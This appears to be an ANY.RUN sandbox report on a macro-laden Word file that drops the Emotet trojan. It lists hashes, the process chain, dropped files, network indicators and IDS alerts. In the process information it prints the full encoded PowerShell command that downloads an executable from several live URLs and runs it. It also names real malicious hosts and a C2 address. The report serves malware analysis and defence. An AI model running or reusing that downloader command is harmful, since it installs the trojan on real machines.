analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

C117243362190320_2019.doc

Full analysis: https://app.any.run/tasks/45c66e7e-ac83-476d-af75-6b5c45fd4ce9
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 11, 2019, 10:25:56
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
emotet
trojan
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

AB89B73F025F7C74F099EB09A60376CA

SHA1:

FEB927C725222B625226A5C2A9DB15F6EBB1AC6A

SHA256:

6FFA77A8FABCBDEC2199ABD48A9674DED43CFE9FE1FD318F1054244AB699CF15

SSDEEP:

6144:zBV3mPHiO7h2eHmDGv0vxuIMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwH:SfiO70FDG8vxuI8SVIf51E4K14o8IuC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2948)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2948)
    • Application was dropped or rewritten from another process

      • 422.exe (PID: 3252)
      • 422.exe (PID: 2236)
      • wabmetagen.exe (PID: 2484)
      • wabmetagen.exe (PID: 3864)
    • Request from PowerShell which ran from Office

      • POwershell.exe (PID: 3880)
    • Emotet process was detected

      • wabmetagen.exe (PID: 3864)
    • EMOTET was detected

      • wabmetagen.exe (PID: 2484)
    • Downloads executable files from the Internet

      • POwershell.exe (PID: 3880)
    • Connects to CnC server

      • wabmetagen.exe (PID: 2484)
  • SUSPICIOUS

    • Creates files in the user directory

      • POwershell.exe (PID: 3880)
    • Executable content was dropped or overwritten

      • POwershell.exe (PID: 3880)
      • 422.exe (PID: 2236)
    • Starts itself from another location

      • 422.exe (PID: 2236)
    • Connects to unusual port

      • wabmetagen.exe (PID: 2484)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2948)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2948)
    • Dropped object may contain Bitcoin addresses

      • POwershell.exe (PID: 3880)
      • 422.exe (PID: 2236)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://SFR1zh.OCS60j.FADw9io
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 366950 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://SFR1zh.OCS60j.FADw9io
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 005D7FC8
WordDocumentBodySectPRsidRDefault: 002716AD
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 002716AD
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 84578 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: lDMVM8
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:11 08:13:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:11 08:13:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 422.exe no specs 422.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2948"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\C117243362190320_2019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
3880POwershell -e JABMAEgAcwB6AFIAUgBBAD0AKAAnAHAAJwArACcAVABsAEIAbAAnACsAJwA3AFUAJwApADsAJABxAFAASwBDAGMAcgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6ADIAaABNADAAZABSAGgAPQAoACcAaAB0ACcAKwAnAHQAcAA6AC8ALwBtAGEAcwBrAC4AcwB0ACcAKwAnAHUAZAAnACsAJwBpACcAKwAnAG8AJwArACcALwBZACcAKwAnAGUAawBBADIAOAAyAHYAcgBYAHIAZABoACcAKwAnAFUAQABoACcAKwAnAHQAJwArACcAdABwACcAKwAnADoALwAvAGYAZQBuACcAKwAnAGkAYwBoAGsAYQAuAHIAdQAvAGcAeABiAFEANwAnACsAJwBlAE8AJwArACcAdQAnACsAJwBuAGYAJwArACcAZgAnACsAJwBKAEAAaAAnACsAJwB0AHQAcAA6ACcAKwAnAC8AJwArACcALwAnACsAJwAyACcAKwAnADAANgAnACsAJwAuACcAKwAnADEAJwArACcAOAAnACsAJwA5AC4ANgAnACsAJwA4AC4AJwArACcAMQA4ADQAJwArACcALwA4AG4AUQB5AGoAOABpAGYASwBtAFkAJwArACcAYwBAAGgAdAAnACsAJwB0AHAAOgAvAC8AdABoACcAKwAnAGEAbABlAHMALQAnACsAJwBsAGEAcwAuACcAKwAnAGMAZgBkACcAKwAnAHQALQAnACsAJwBmAGcAJwArACcAbQBtAC4AZgAnACsAJwByACcAKwAnAC8AYwBnAGkALQBiACcAKwAnAGkAbgAnACsAJwAvAG0AYQBHAFIAQQA4AGkAWQBnACcAKwAnAEQAJwArACcAQwAnACsAJwBQAE0AJwArACcARwBAAGgAdAB0ACcAKwAnAHAAJwArACcAOgAnACsAJwAvAC8AcAByAG8AJwArACcAcwBwACcAKwAnAGUAcgBpAHQAeQAtAHMAdAB1AGQAZQBuAHQALgBjAG8ALgAnACsAJwB1AGsAJwArACcALwAnACsAJwBtAGwAJwArACcAMgBOAFEAZgBmAG8ATQBtAHkASgAnACsAJwBzADYAJwArACcASgAnACkALgBTAHAAbABpAHQAKAAnAEAAJwApADsAJABkAFEASwA0AEcASwA1AEIAPQAoACcAQQAnACsAJwB6ACcAKwAnAGQAMQBIAHIAVgA5ACcAKQA7ACQAYwBQADMAawBQAG4ASAAzACAAPQAgACgAJwA0ADIAJwArACcAMgAnACkAOwAkAHoAcwAwAE8AUgBqADgAPQAoACcAaAAnACsAJwA1AGgAJwArACcAYgBUAHoAJwApADsAJABmADMAUgBzAHIAbwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYwBQADMAawBQAG4ASAAzACsAKAAnAC4AZQB4ACcAKwAnAGUAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAWQBsAHQATgBPAGkAIABpAG4AIAAkAHoAMgBoAE0AMABkAFIAaAApAHsAdAByAHkAewAkAHEAUABLAEMAYwByAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFkAbAB0AE4ATwBpACwAIAAkAGYAMwBSAHMAcgBvACkAOwAkAEEAaAA0AFEAbgBKAD0AKAAnAFIAZAAnACsAJwBkAFQAUQA5ADYAJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAZgAzAFIAcwByAG8AKQAuAGwAZQBuAGcAdABoACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsASQBuAHYAbwBrAGUALQBJAHQAZQBtACAAJABmADMAUgBzAHIAbwA7ACQAZABpAEsAbwB3AG8APQAoACcAVABOAEYAJwArACcAUgBCAGoAUgBVACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJAB0ADQAVQBXAGkAUQBvADgAPQAoACcAdgBBAHAAMABPACcAKwAnAFcAdQAnACkAOwA= C:\Windows\System32\WindowsPowerShell\v1.0\POwershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3252"C:\Users\admin\422.exe" C:\Users\admin\422.exePOwershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
Modules
Images
c:\users\admin\422.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2236"C:\Users\admin\422.exe"C:\Users\admin\422.exe
422.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
Modules
Images
c:\users\admin\422.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3864"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
422.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
Modules
Images
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wininet.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
2484"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Version:
2001.12.4414.258
Modules
Images
c:\users\admin\appdata\local\wabmetagen\wabmetagen.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wininet.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events
1 665
Read events
1 252
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR68FB.tmp.cvr
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A0345F8F.FADw9io
MD5:
SHA256:
3880POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3SJJ2KU6ZR938Q5CVFWR.temp
MD5:
SHA256:
2948WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$17243362190320_2019.docpgc
MD5:CE33B6DCE55EB70DDA895B575E0A2655
SHA256:1ED2BF68D3DB4964028025588F71D4008EE5FF9C6E3B4667C27B2C2B331AEECE
3880POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3880POwershell.exeC:\Users\admin\422.exeexecutable
MD5:352C3D3FC58E6599E3F72075C0CFBFC4
SHA256:6F3423D4E498F456CFFAF91734A422C6C6C4B0677BB457042154CDB9FC12B3FB
2948WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D54EF75E542155A03DAEF5B6D413EEBB
SHA256:562D35F242B53183D0D079C1C1AD18E899707440C8E0659262664879D6B869B7
3880POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2471c5.TMPbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2236422.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:352C3D3FC58E6599E3F72075C0CFBFC4
SHA256:6F3423D4E498F456CFFAF91734A422C6C6C4B0677BB457042154CDB9FC12B3FB
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3880
POwershell.exe
GET
200
195.208.1.102:80
http://mask.studio/YekA282vrXrdhU/
RU
executable
455 Kb
malicious
3880
POwershell.exe
GET
301
195.208.1.102:80
http://mask.studio/YekA282vrXrdhU
RU
html
330 b
malicious
2484
wabmetagen.exe
GET
133.242.164.31:7080
http://133.242.164.31:7080/
JP
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3880
POwershell.exe
195.208.1.102:80
mask.studio
Autonomous Non-commercial Organization Regional Network Information Center
RU
malicious
2484
wabmetagen.exe
133.242.164.31:7080
SAKURA Internet Inc.
JP
malicious

DNS requests

Domain
IP
Reputation
mask.studio
  • 195.208.1.102
malicious

Threats

PID
Process
Class
Message
3880
POwershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3880
POwershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3880
POwershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
2484
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info